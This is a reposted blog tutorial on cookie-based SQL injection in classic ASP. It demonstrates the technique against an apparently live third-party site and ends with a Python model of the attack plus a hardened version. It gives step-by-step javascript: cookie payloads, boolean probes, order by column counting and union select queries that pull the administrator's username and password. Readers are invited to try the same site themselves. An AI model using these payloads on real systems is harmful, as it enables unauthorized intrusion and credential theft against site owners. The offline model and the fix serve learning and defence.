Cookie injection Principle

Source: Internet
Author: User

www.2cto.com editor's note: this article covers the basics of cookie injection, a topic the site had not addressed specifically before.

Today, while bypassing the protections of a website, I came across a site that could be injected through cookies. Since my own blog's earlier articles do not seem to have covered cookie injection either, this post uses a live site as the example and shows how to perform cookie injection by hand.

Cookie injection works the same way as ordinary injection; the only difference is that the injected parameter is submitted in a cookie. Normally we inject through GET or POST: with GET the statement to inject is appended to the URL, with POST it is sent through a form. The visible difference between the two is that GET parameters appear in the browser's address bar and POST parameters do not.

Compared with GET and POST injection, cookie injection is slightly more involved, because we first have to modify the cookie; here that is done with a javascript: URL typed into the address bar. Two conditions must also hold. Condition 1: the program filters data submitted by GET and POST but does not filter data submitted in cookies. Condition 2: on top of that, the program reads the submitted value with the bare request("xxx") call, without naming the collection (Request.QueryString or Request.Form) it should come from. In classic ASP, Request("xxx") searches the collections in a fixed order: QueryString, Form, Cookies, ClientCertificate, ServerVariables. So when the parameter is absent from the query string and the form, the value stored in the cookie is the one the program uses, and it never passes through the filter.

Here is a concrete example. The target site is http://www.bkjia.com/Products_show.asp?Id=284, and the Id parameter is the injection point. First we test for injection in the usual way, by appending and 1=1 to the URL.

We can see that an anti-injection system responds. But so far we have submitted the parameter by GET; now we submit the same id=284 in a cookie instead, to see whether the program really reads it with the bare request("xx"). To switch to a cookie, first open the normal page, http://www.bkjia.com/Products_show.asp?Id=284. Once it has fully loaded, clear the browser's address bar and enter:

javascript:alert(document.cookie="id="+escape("284"))

Here "id=" corresponds to the id= in Products_show.asp?Id=284, and the "284" inside escape() is its value; both must be adapted to the actual target. escape() percent-encodes characters such as spaces and "=" so that the cookie value stays well-formed; the server decodes it again when it reads the cookie. Press Enter, and a dialog box shows the cookie that has just been set.
 



Now that the cookie has been changed, we check that the page still works through it. In another window of the same browser (so the cookie is sent), open http://www.bkjia.com/Products_show.asp with the "Id=284" removed from the address, and see whether the page loads normally.

The page is identical to the one at http://www.bkjia.com/Products_show.asp?Id=284. That means the program does not name a collection when it reads the value; it uses the bare request("xx"), so the cookie value is picked up. One of the two conditions for cookie injection is confirmed. Next we test whether special characters get through, that is, whether the program filters cookie data. Go back to the address bar and enter:

javascript:alert(document.cookie="id="+escape("284 and 1=1"))

Then refresh http://www.bkjia.com/Products_show.asp and check that the page is still normal. If it is, submit:

javascript:alert(document.cookie="id="+escape("284 and 1=2"))

Refresh the page again; this time an error occurs.

The error is clearly displayed in place of the product content, which confirms that the page can be injected through the cookie. From here, exploitation proceeds exactly as in ordinary injection. We can use union select to read the administrator's account and password, provided we know the name of the admin table and its fields; we can guess them.

First, use order by to determine the number of columns in the query the page runs. Submit:

javascript:alert(document.cookie="id="+escape("284 order by 1"))

If the page is normal, order by works and can be used to count the columns. If it produces an error, order by cannot be used to guess the column count here, and you have to try union select with 1, 2, 3, ... columns one by one. Then submit:

javascript:alert(document.cookie="id="+escape("284 order by 10"))

If the page is still normal, there are more than ten columns; keep going until the count is found. In this case, order by 21 gave an error after refreshing the page and order by 20 was normal, so the query has 20 columns.

Next we submit:

javascript:alert(document.cookie="id="+escape("284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from manage"))

If that produces an error, submit:

javascript:alert(document.cookie="id="+escape("284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin"))

This time a normal page is returned.

The familiar figure appears: the numbers from the union select show up in the page. This tells us the database has an admin table, because the same query against manage errored; a union select against a table that does not exist fails. Swapping the table name after from is how you test whether a table exists. Now we try username and password in positions 6 and 17, the two positions the page renders, and see whether an error occurs; if it does, the username or password field does not exist. We submit:

javascript:alert(document.cookie="id="+escape("284 union select 1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,password,18,19,20 from admin"))

As the screenshot shows, the administrator's account and password are disclosed in positions 6 and 17, although the password could not be cracked. Readers can practice on the site themselves. In general, cookie injection is the same as ordinary injection; only the way the injected statement is submitted differs. If you understand the principles of ordinary injection, cookie injection is not difficult.
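As an added example (not code from the article or from the target site), the Python model below reproduces both conditions and the whole cookie-based procedure offline: a toy anti-injection filter that sees only GET and POST, a collection-less Request() lookup that falls through to cookies, a page that concatenates id into its SQL, and the attacker-side steps (and 1=1 against and 1=2, order by counting, union select against a guessed table name). sqlite3 stands in for the site's database; the table names, the rows, the 4-column product query (the article's had 20) and the hardened page products_show_fixed are all constructed assumptions, and the hardened page goes beyond the article by showing the fix: name the collection, validate the type, bind the value.

```python
# Added example, not code from the article or its target: an offline model of the
# two conditions the article names. Classic ASP Request("id") with no collection
# searches QueryString, then Form, then Cookies; the toy filter checks only the
# first two. sqlite3 stands in for the site's database; all data is constructed.
import sqlite3
from urllib.parse import quote, unquote

BLOCKED = ("and ", "or ", "select", "union", "order by", "'", "--")

def anti_injection(value):
    """Crude keyword filter like the one the article's target applies to GET/POST."""
    for needle in BLOCKED:
        if needle in value.lower():
            raise ValueError(f"anti-injection blocked {needle!r}")

def asp_request(name, querystring, form, cookies):
    """Model of the collection-less Request(name): the first collection holding it wins."""
    for collection in (querystring, form, cookies):
        if name in collection:
            return collection[name]
    return ""

def build_db():
    """Constructed sample database: a 4-column products table plus an admin table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, descr TEXT);
        INSERT INTO products VALUES (284, 'Widget', 9.99, 'A constructed product');
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-hash-value');""")
    return db

def products_show(db, querystring=None, form=None, cookies=None):
    """Vulnerable page: filters GET/POST only (condition 1), then reads id with the
    collection-less Request() (condition 2) and concatenates it into the SQL."""
    querystring, form, cookies = querystring or {}, form or {}, cookies or {}
    for value in list(querystring.values()) + list(form.values()):
        anti_injection(value)
    # ASP URL-decodes cookie values, which is why the article wraps them in escape().
    pid = unquote(asp_request("id", querystring, form, cookies))
    rows = db.execute("SELECT id, name, price, descr FROM products WHERE id=" + pid).fetchall()
    if not rows:
        raise LookupError("BOF or EOF")  # the recordset error page the article gets for 1=2
    return rows

def products_show_fixed(db, querystring=None, **_ignored):
    """Hardened page: names the collection, validates the type and binds the value."""
    pid = (querystring or {}).get("id", "")
    if not pid.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name, price, descr FROM products WHERE id=?"
    return db.execute(sql, (int(pid),)).fetchall()

def cookie_jar(payload):
    """What javascript:alert(document.cookie="id="+escape(payload)) leaves in the jar;
    escape() leaves @*_+-./ unencoded, so quote() with that safe set approximates it."""
    return {"id": quote(payload, safe="@*_+-./")}

def probe(db, payload, via="cookie", page=products_show):
    """Send payload by GET or by cookie and classify the response as the article does."""
    if via == "get":
        request = {"querystring": {"id": payload}}
    else:
        request = {"cookies": cookie_jar(payload)}
    try:
        page(db, **request)
        return "normal"
    except (ValueError, LookupError, sqlite3.OperationalError):
        return "error"

def count_columns(db, base="284", limit=64):
    """ORDER BY n is accepted while n <= column count; the first error gives the count."""
    for n in range(1, limit + 1):
        if probe(db, f"{base} order by {n}") == "error":
            return n - 1
    raise RuntimeError("column count exceeds limit")

def union_dump(db, base, ncols, table, columns, slots):
    """UNION SELECT with numbered placeholders and the named columns put into the chosen
    1-based slots; returns what those slots display for every row on the page."""
    select_list = [str(i) for i in range(1, ncols + 1)]
    for slot, column in zip(slots, columns):
        select_list[slot - 1] = column
    payload = f"{base} union select {','.join(select_list)} from {table}"
    rows = products_show(db, cookies=cookie_jar(payload))
    return [tuple(row[s - 1] for s in slots) for row in rows]

def walkthrough(db=None):
    """Replays the article's steps against the model and returns each observation."""
    db = db or build_db()
    ncols = count_columns(db)
    numbers = ",".join(str(i) for i in range(1, ncols + 1))
    return {
        "get_and_1=1": probe(db, "284 and 1=1", via="get"),  # the filter sees GET
        "cookie_284": probe(db, "284"),                      # bare Request() reads the cookie
        "cookie_and_1=1": probe(db, "284 and 1=1"),          # cookies are not filtered
        "cookie_and_1=2": probe(db, "284 and 1=2"),          # error page: injectable
        "columns": ncols,
        "manage_table": probe(db, f"284 union select {numbers} from manage"),  # no such table
        "admin_rows": union_dump(db, "284", ncols, "admin", ("username", "password"), (2, 3)),
        "fixed_cookie": probe(db, "284 and 1=1", page=products_show_fixed),   # cookie ignored
        "fixed_get": probe(db, "284", via="get", page=products_show_fixed),
    }
```

Calling walkthrough() returns the observations in the order the article makes them: the GET probe is blocked, the same payload in the cookie is not, and 1=2 produces the error page, order by stops at the column count, the guessed table manage errors while admin does not, and the admin row appears in the slots chosen for username and password. The hardened page rejects the cookie-borne payload because it only ever reads Request.QueryString("id") and refuses anything that is not an integer.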

From R4bb17's Blog
